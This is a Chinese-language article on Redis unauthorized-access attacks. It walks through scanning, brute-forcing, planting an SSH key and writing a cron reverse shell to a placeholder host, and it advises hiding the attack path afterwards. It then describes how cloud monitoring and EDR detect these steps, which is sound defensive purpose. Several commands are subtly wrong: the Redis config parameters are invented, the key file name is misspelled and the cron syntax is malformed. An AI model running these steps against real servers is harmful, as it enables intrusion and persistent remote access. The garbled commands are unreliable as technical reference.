Redis未授权访问漏洞介绍

1、Redis应用介绍

Redis是key-value数据库，一般企业级使用场景为内部查询缓存。支持的value值包括string、list、set、zset和hash，为了保证效率，数据都是缓存在内存中，当然redis会周期性的把更新数据写入到磁盘或者吧修改操作写入追加的记录文件，并且在此基础上实现了master-slave同步。

2、Redis未授权访问漏洞概述

Redis因配置不当导致未授权访问（Redis绑定6379端口没有开启认证（默认配置）），被黑客利用，形成严重的威胁事件。利用手段：在特定条件下，如果Redis以root权限运行，黑客可以写入SSH公钥文件，从而直接通过SSH登录。导致数据库泄密或者勒索事件的发送，严重威胁我们的业务服务器安全。

黑客自动化weapon攻击流程

3、攻击手段

·获取服务器开放端口信息

Nmap -A -p 6379 -script redis-info x.x.x.x

·安装redis的python访客包模拟client访问服务器

·如果密码不为空的情况下使用hydra暴力破解。

·写入SSH公钥，获得操作权限

(1)首先在C&C服务器上生成自己的公钥 ssh-keygen -t rsa

(2)将公钥导入都C2key.txt文件

(3)通过修改数据库默认路径为root/.ssh和默认的缓冲文件authorized.keys把缓冲数据写入到文件中，这样就可以生成一个授权的key。

Config set mypath /root/.ssh
Config set myname authorized.keys

(4)最重要的一点，搞完之后要隐藏攻击路径。恢复设置

·写入反弹shell

set yyy "\n\n* /1 /bin/bash -i>&/dev/tcp/x.x.x.x/5678 0>&1\n\n" 
Config set mypath /var/spool/cron
Config set myname root

当然可以直接写入挖矿程序、webshell、勒索软件、DDoS攻击程序等攻击手段

云态势感知如何发现

1、态势感知产品发现手段

·Redis未授权扫描行为研判

在扫描流量进入到公有云中心的时候，我们需要对Flow流数据做数据聚类分析，因为自动化攻击程序一般偶读是扫描批量扫描6739端口。把来自同一IP或者同一时间段的入网数据流做聚类分析，很容易发现过滤。同时配合多源威胁情报系统，把扫描集群IP筛选出来。产生确定的告警行为。

·redis暴力破解行为研判

通过传统网络入侵检测系统可以通过连接频率判定暴力破解行为。

·redis弱口令

我们可以站在防御者视角对自己的Redis服务器做数据基线扫描

网络层面基线扫描（使用肉口令字典判断）
主机层面EDR产品扫描（配置文件检查项）

·反弹shell检测

通过EDR程序上报服务器上的对外连接，同时结合威胁情报系统数据，形成对外可疑连接告警事件，

·挖矿程序

可以通过云沙箱方式把相关数据上传到沙箱中运行，形成恶意文件下载事件。

·对外DDoS

这是一种肉鸡行为，通过ET规则可以监控到对外发包特征。形成对外DDoS告警事件。

·勒索软件

可以通过云沙箱方式把相关数据上传到沙箱中运行，形成恶意文件下载告警事件。

2、攻击链分析

经过以上检测引擎发现的告警事件，我们可以把整个入侵过程串联起来，形成攻击链

总结

攻击链分析，是我们呈现给用户最有用的入侵证据链，当然这些需要有安全运营人员更好的自动化编排系统，把发现的入侵手段，融入到我们安全运营平台中。同时通过红蓝对抗的方式验证其效果。